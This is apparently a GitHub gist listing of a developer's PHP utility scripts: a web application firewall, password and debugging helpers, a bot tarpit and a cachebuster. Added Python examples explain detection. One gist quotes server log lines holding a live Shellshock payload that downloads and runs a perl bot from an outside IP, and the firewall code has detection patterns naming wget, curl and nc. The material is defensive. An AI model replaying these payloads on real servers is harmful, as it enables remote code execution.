
@dhaupin
dhaupin / dev_script_simple_web_app_firewall.php
Last active April 21, 2022 18:20
Function - WAF - Look for common injection, traversal, or escalation hits, then init an action
<?php
// @@TODO@@ classify this as a public pre-controller
// @@TODO@@ semicolon var, might help edge-case \xYZ style hex escapes -- might affect speed though
// @@TODO@@ make vars to turn on blocking of common WP and enterprise requests
// @@TODO@@ make modes to check in user agent, referrer, post, headers
// @@TODO@@ mode for strict validation of IP in addr + forwarder style headers
// @@TODO@@ testing mode (still allows traffic)
// @@TODO@@ log wrapper and modes
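The TODO list above describes the pre-controller the gist is working toward: normalise each request component, look for injection, traversal and escalation signatures, then pick an action, with a testing mode that never blocks. The following is an added example written for this page, not the gist's code: a framework-agnostic Python sketch of that flow. The field names (`path`, `query`, `post`, `user_agent`, `referer`, `headers`), the signature list and the `\xHH` decoding are illustrative assumptions, not taken from the gist.

```python
import re
import urllib.parse

# Added example (not the gist's code). Signature list and request field names are
# assumptions chosen for illustration; a real deployment tunes both.
SIGNATURES = {
    "traversal":  re.compile(r"(?:\.\./|\.\.\\|/etc/passwd|/proc/self)", re.I),
    "sqli":       re.compile(r"(?:\bunion\b.{0,20}\bselect\b|'\s*or\s*'?1'?\s*=\s*'?1|;\s*drop\s+table|sleep\(\d+\))", re.I),
    "xss":        re.compile(r"(?:<script\b|javascript:|on(?:error|load|mouseover)\s*=)", re.I),
    "shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),
    "cmd":        re.compile(r"(?:;|\|\||&&|`)\s*(?:wget|curl|lwp-download|perl|sh|bash|nc)\b", re.I),
}

_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def normalise(value: str) -> str:
    """Decode the encodings used to slip past naive matching: percent-encoding
    (applied twice, so double-encoded payloads such as %252e%252e come out as ..),
    '+' as space, and C-style \\xHH escapes (the gist's "\\xYZ style" TODO).
    Matching runs on the decoded form; callers keep the raw value for logging."""
    out = value
    for _ in range(2):
        out = urllib.parse.unquote_plus(out)
    return _HEX.sub(lambda m: chr(int(m.group(1), 16)), out)


def scan_request(request: dict,
                 fields=("path", "query", "post", "user_agent", "referer", "headers")) -> list:
    """Return (field, rule) pairs for every signature hit across the selected components.
    `request` is a plain dict; `query`, `post` and `headers` are dicts whose values are scanned."""
    hits = []
    for field in fields:
        value = request.get(field)
        if value is None:
            continue
        parts = value.values() if isinstance(value, dict) else [value]
        for part in parts:
            decoded = normalise(str(part))
            for rule, pattern in SIGNATURES.items():
                if pattern.search(decoded):
                    hits.append((field, rule))
    return hits


def decide(hits: list, testing_mode: bool) -> str:
    """Map hits to an action. Testing mode corresponds to the gist's
    "still allows traffic" TODO: hits are recorded but nothing is blocked."""
    if not hits:
        return "allow"
    return "log-only" if testing_mode else "block"
```

The two-pass percent decode is the part worth copying: a single `unquote` leaves `%252e%252e%252f` as `%2e%2e%2f`, which matches none of the traversal patterns, while the decoded request still reaches the application as `../`.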
dhaupin / DUMP_perlbot.txt
Created July 12, 2016 15:52
Rando example of CVE-2016-4971: the User-Agent carries a Shellshock-style `() { :;};` function definition (the CVE-2014-6271 pattern) that downloads and runs a perl bot from the attacker's host
# http://31.220.3.180/mox
#/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://31.220.3.180/g.pl;curl -O http://31.220.3.180/g.pl;wget http://31.220.3.180/g.pl;perl /tmp/g.pl*;perl g.pl;rm -rf /tmp/g.pl*\""
#/usr/local/apache/domlogs/123.123.123.123:31.220.3.180 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://31.220.3.180/mox;curl -O http://31.220.3.180/mox;wget http://31.220.3.180/mox;perl /tmp/mox*;perl mox;rm -rf /tmp/mox*\""
##############################################################################
#!/usr/bin/perl
# ------------------------------------------------------------- #
dhaupin / DUMP_shell_commands.txt
Last active October 27, 2017 07:58
Rando Shell Commands for cPanel Servers
##################
# Logs #
##################
# Look through syslogs; ignore local, the 10.30.9.x and 209.203.197.x whitelist ranges, and "socket failed" noise (dots escaped so they match literally)
grep -Ev --color=always '(127\.0\.0\.1|10\.30\.9\.|209\.203\.197\.|socket failed)' /var/log/messages /var/log/secure | less -R
# Look through IP domlogs for a month; ignore whitelist IPs, known bots/crawlers, and ControlScan (207.198.99.x)
grep -sh --color=always "Sep/2016" /usr/local/apache/domlogs/{50.28.34.226,206.196.110.58} | grep -Ev '(LiquidWeb|nagios|209\.203\.197\.|Google|bing|Baidu|Netcraft|majestic12|207\.198\.99\.)' | less -R
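The grep pipelines above and the domlog lines in DUMP_perlbot.txt are the same hunt done by hand: strip whitelisted sources and crawlers, then look at what is left for the `() { :;};` User-Agent. The following is an added example written for this page, not code from either gist: it parses Apache combined-format lines, applies the same exclusions as the `grep -Ev` filters, flags Shellshock-style User-Agents and pulls out the URLs the payload tries to fetch, so the dropper hosts can be counted and fed to a blocklist. The sample lines are constructed in the shape of the gist's domlog entries with placeholder IPs and hosts; the whitelist ranges are taken from the grep commands.

```python
import re
from collections import Counter

# Added example (not from either gist). Placeholder IPs/hosts; whitelist ranges
# copied from the grep -Ev patterns above.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
SHELLSHOCK = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")   # CVE-2014-6271 function-definition prefix
URL = re.compile(r"(?:https?|ftp)://[^\s\"';|*]+")    # stop at the shell separators used in the payload
WHITELIST = re.compile(r"^(?:127\.0\.0\.1|10\.30\.9\.\d+|209\.203\.197\.\d+)$")
BOTS = re.compile(r"LiquidWeb|nagios|Google|bing|Baidu|Netcraft|majestic12", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line.rstrip("\n"))
    if not m:
        return None
    d = m.groupdict()
    d["ua"] = d["ua"].replace('\\"', '"')   # undo Apache's escaping of quotes inside the UA
    return d


def is_noise(entry):
    """Mirror the grep -Ev exclusions: whitelisted sources and known crawlers/monitors."""
    return bool(WHITELIST.match(entry["ip"]) or BOTS.search(entry["ua"]))


def shellshock_hits(lines):
    """(entry, [urls]) for each non-noise line whose User-Agent carries a Shellshock payload."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None or is_noise(e) or not SHELLSHOCK.search(e["ua"]):
            continue
        hits.append((e, URL.findall(e["ua"])))
    return hits


def dropper_hosts(lines):
    """Count payload hosts across all hits; these are the IOCs to hunt for in other logs."""
    c = Counter()
    for _, urls in shellshock_hits(lines):
        for u in urls:
            c[u.split("/")[2]] += 1
    return c


# Constructed sample, same shape as the DUMP_perlbot.txt domlog lines (placeholder IPs/hosts)
SAMPLE = [
    '203.0.113.7 - - [16/Mar/2016:10:57:33 -0400] "GET /hello HTTP/1.0" 404 1987 "-" '
    '"() { :;}; /bin/bash -c \\"cd /tmp;lwp-download -a http://198.51.100.9/g.pl;curl -O http://198.51.100.9/g.pl;perl /tmp/g.pl*;rm -rf /tmp/g.pl*\\""',
    '203.0.113.7 - - [27/May/2016:08:09:12 -0400] "GET /bashh HTTP/1.0" 404 1984 "-" '
    '"() { :;}; /bin/bash -c \\"cd /tmp;wget http://198.51.100.9/mox;perl /tmp/mox*;rm -rf /tmp/mox*\\""',
    '209.203.197.5 - - [27/May/2016:08:10:00 -0400] "GET / HTTP/1.1" 200 512 "-" "() { :;}; echo whitelisted-scanner"',
    '198.51.100.23 - - [27/May/2016:08:11:00 -0400] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
]

if __name__ == "__main__":
    for entry, urls in shellshock_hits(SAMPLE):
        print(entry["ip"], entry["ts"], entry["req"], urls)
    print(dict(dropper_hosts(SAMPLE)))
```

Note that the request itself is a 404 in both real lines: the payload rides in the User-Agent, so filtering on status code or path finds nothing. The exclusion step matters as well, and cuts both ways: a whitelisted scanner that also sends the pattern (line three of the sample) is dropped, which is exactly what the grep does and what you may not want during an incident.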
dhaupin / dev_script_ui_breakpoint_listener.css
Last active December 2, 2019 03:16
Function - Listen for changes in CSS media breakpoints - append UI attribs to <html>
/* UI Breakpoint Listener
* Requires underscore/lodash for _debounce
*/
body:after {
content: 'widescreen';
display: none;
}
@media screen and (max-width: 1024px){
body:after {
dhaupin / dev_script_chk_common_passwords.php
Last active March 11, 2016 01:10
Function - Parse list of 10,000 most used passwords and return JSON or Object match for use on account validation
<?php
// This is part of a form class; this function shall also be available via a route with an optional ?search= param
// password list: https://github.com/danielmiessler/SecLists/blob/master/Passwords/10_million_password_list_top_10000.txt
// example: www.example.com/chkpw.php?search=dra would return "dragon" (always returns the first password found)
public function chkpass($password = false, $json = true) {
$pool = $output = array();
// NOTE: fetching the list over HTTP on every call is slow and makes signup validation depend on a third-party host being up; load a local copy once instead
$pool = file('https://src.creadev.org/apps/pwlist/pwlist.txt', FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES);
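The gist's chkpass() does two things with one list: an exact check used for account validation and a prefix search behind the ?search= route that returns the first entry in list order. The following is an added example for this page, not the gist's code, showing both behaviours with the list loaded once from a local file rather than fetched over HTTP per call. The ten-entry list is a constructed stand-in for the SecLists top-10000 file (which is ordered by frequency, so "first match" means "most common match"); the class and method names are assumptions.

```python
import json

# Added example (not the gist's code). SAMPLE_LIST is a constructed stand-in for
# the SecLists top-10000 file; load the real file once with CommonPasswords.from_file().
SAMPLE_LIST = """123456
password
12345678
qwerty
123456789
dragon
baseball
football
letmein
monkey
"""


class CommonPasswords:
    def __init__(self, text: str):
        # Keep list order (frequency order in the SecLists file) and dedupe.
        seen = set()
        self.ordered = []
        for line in text.splitlines():
            pw = line.rstrip("\r")
            if pw and pw not in seen:
                seen.add(pw)
                self.ordered.append(pw)
        self.lookup = frozenset(self.ordered)   # O(1) membership for the validation path

    @classmethod
    def from_file(cls, path: str) -> "CommonPasswords":
        with open(path, encoding="utf-8", errors="replace") as fh:
            return cls(fh.read())

    def is_common(self, password: str) -> bool:
        """Exact, case-sensitive membership: the check a signup form should use.
        Prefix matching is not appropriate here; "dragon2024" is not "dragon"."""
        return password in self.lookup

    def search(self, prefix: str):
        """First list entry starting with `prefix`, like the gist's ?search= route; None if nothing matches."""
        for pw in self.ordered:
            if pw.startswith(prefix):
                return pw
        return None

    def chkpass(self, password=None, search=None, as_json=True):
        """Route-style wrapper mirroring the gist's signature.
        Returns {'match': <entry or None>, 'common': <bool>} as JSON or a dict."""
        result = {"match": None, "common": False}
        if password is not None:
            result["common"] = self.is_common(password)
            result["match"] = password if result["common"] else None
        elif search:
            result["match"] = self.search(search)
        return json.dumps(result) if as_json else result
```

Loading once at startup also means the check still works when the list's origin host is unreachable, which is the failure mode of calling `file()` on a remote URL inside a request handler.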
dhaupin / dev_script_x_debugger_logger.php
Last active April 28, 2017 17:09
Function - print_r() and trace using x_r() wrapper with optional JS console.dir() or clean exit(). Additional x_dump() simple file dump.
<?php
// Exits with a print_r and call trace for debugging
// $hidden inits array output into browser console
// Backtrace: jurchiks101 at gmail dot com - http://php.net/manual/en/function.debug-backtrace.php#112238
if (!function_exists('x_r')) {
function x_r($obj, $exit = true, $return = true, $hidden = false, $console_msg = '') {
// include a debug call trace
$e = new Exception();
dhaupin / dev_script_google_merch_taxonomy.php
Last active September 12, 2021 09:26
Function - Parse Google merchant center shopping categories into Array or JSON - works with search url param or direct category_id argument
<?php
// This is part of a product class; this function shall also be available via a route with an optional ?search= param
// $this->request->get is platform specific; change it to whatever your request wrapper uses
public function googlecats($cat_ids = false) {
// default format
$json = true;
dhaupin / dev_script_bot_tarpit.php
Last active December 12, 2022 03:19
Function - Bot honeypot + timewaster tarpit + Fail2Ban
<?php
// Dribbler Tarbaby Community v.0.1.0 - Copyright 2013-2014 under GNU/GPL
// Original script by Mike ([email protected])
// http://www.stopforumspam.com/forum/viewtopic.php?pid=41173
//
// Contributors:
// John Darkhorse
// Derek Haupin ([email protected])
//
// @@ WARNING @@
dhaupin / dev_script_logger_console_sys.php
Last active March 4, 2016 16:31
Function - Send debug logs to browser console and/or system log (var/log/messages)
<?php
// This goes in your log class, for this example we will access it in the view as $this->log->consoled
// These call a native platform log method, for this example we will call it $this->write()
public function syslog($message, $errlog = false) {
syslog(LOG_NOTICE, 'debug: (' . $_SERVER['SERVER_NAME'] . '@' . $_SERVER['SERVER_ADDR'] . ') [INFO] ' . $this->clean($message));
if ($errlog) {
$this->write('@System | ' . $message);
dhaupin / dev_script_asset_cachebuster.php
Last active November 10, 2016 19:51
Function - Cachebuster - Add timestamp to assets in order to break out of browser caching
<?php
if (!function_exists('addTimestamp')) {
function addTimestamp($src, $remote = false, $man_v = '') {
if (empty($src)) {
return;
} elseif ($_SERVER['HTTP_HOST'] === $_SERVER['SERVER_NAME']) {
// NOTE: HTTP_HOST is the client's Host header; on a catch-all vhost this comparison can be steered by the request, so prefer a server-side config flag for "is local"
$local_root = $_SERVER['DOCUMENT_ROOT'] . '/';
// optional scheme followed by "//": matches "http://", "https://" and protocol-relative "//" (the original [https]+ class also matched junk like "ttps:")
preg_match('/^(https?:)?\/\//', $src, $src_proto);